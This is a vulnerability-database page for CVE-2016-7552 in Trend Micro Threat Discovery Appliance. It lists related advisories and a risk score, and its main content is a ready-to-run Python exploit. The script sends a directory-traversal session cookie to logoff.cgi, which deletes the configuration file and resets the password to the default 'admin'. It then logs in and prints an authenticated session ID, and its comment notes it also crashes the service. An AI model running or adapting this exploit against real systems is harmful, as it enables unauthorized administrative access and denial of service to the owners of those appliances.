Trend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability（CVE-2016-7552）

🗓️ 21 Apr 2017 00:00:00Reported by RootType

Trend Micro Threat Discovery Appliance pre-auth directory traversal vulnerability allows bypassing authentication by resetting default password as 'admin', causing DoS

Reporter	Title	Published	Views	Family All 24
0day.today	Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_dlp.cgi Remote Code Execution Exploit	20 Apr 201700:00	–	zdt
0day.today	Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_dae.cgi Remote Code Execution Exploit	20 Apr 201700:00	–	zdt
0day.today	Trend Micro Threat Discovery Appliance 2.6.1062r1 logoff.cgi Directory Traversal Exploit	20 Apr 201700:00	–	zdt
ATTACKERKB	CVE-2016-7552	12 Apr 201710:59	–	attackerkb
BDU FSTEC	The vulnerability of the microprogramming software of the Trend Micro Threat Discovery Appliance lies in the improper restriction on the path to the restricted access catalog. This allows a malicious actor to delete arbitrary files with root privileges, bypass authentication procedures, or cause service failures.	23 Nov 201700:00	–	bdu_fstec
Circl	CVE-2016-7552	29 May 201815:50	–	circl
CNVD	Trend Micro Threat Discovery Appliance Directory Traversal Vulnerability (CNVD-2017-10698)	24 May 201700:00	–	cnvd
Check Point Advisories	Trendmicro Threat Discovery Appliance Directory Traversal (CVE-2016-7552)	22 Dec 202000:00	–	checkpoint_advisories
CVE	CVE-2016-7552	12 Apr 201710:00	–	cve
Cvelist	CVE-2016-7552	12 Apr 201710:00	–	cvelist


                                                import re
import os
import sys
import time
import requests
import threading

requests.packages.urllib3.disable_warnings()

if len(sys.argv) != 3:
    print "(+) usage: %s <target> <option [reset][login]>" % sys.argv[0]
    print "(+) eg: %s 172.16.175.123 reset" % sys.argv[0]
    print "(+) eg: %s 172.16.175.123 login" % sys.argv[0]
    sys.exit(-1)

t = sys.argv[1]
o = sys.argv[2]

bu = "https://%s/" % t
l_url = "%scgi-bin/logon.cgi" % bu
o_url = "%scgi-bin/logoff.cgi" % bu

if o.lower() == "login":
    # default password
    r = requests.post(l_url, data={ "passwd":"admin", "isCookieEnable":1 }, verify=False)
    if "frame.cgi" in r.text:
        print "(+) logged in..."
        match = re.search("session_id=(.*); path", r.headers['set-cookie'])
        if match:
            print "(+) authenticated session_id: %s" % match.group(1)
    else:
        print "(-) login failed"
elif o.lower() == "reset":
    print "(+) resetting the default password..."
    r = requests.get(o_url, cookies={"session_id":"../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"}, verify=False)
    # causes an uninitialized free() vulnerability as well...
    if "Memory map" in r.text:
        print "(+) success! now wait for a reboot..."
else:
    print "(-) not a valid option!"

21 Apr 2017 00:00Current

9.4High risk

Vulners AI Score9.4

EPSS0.93249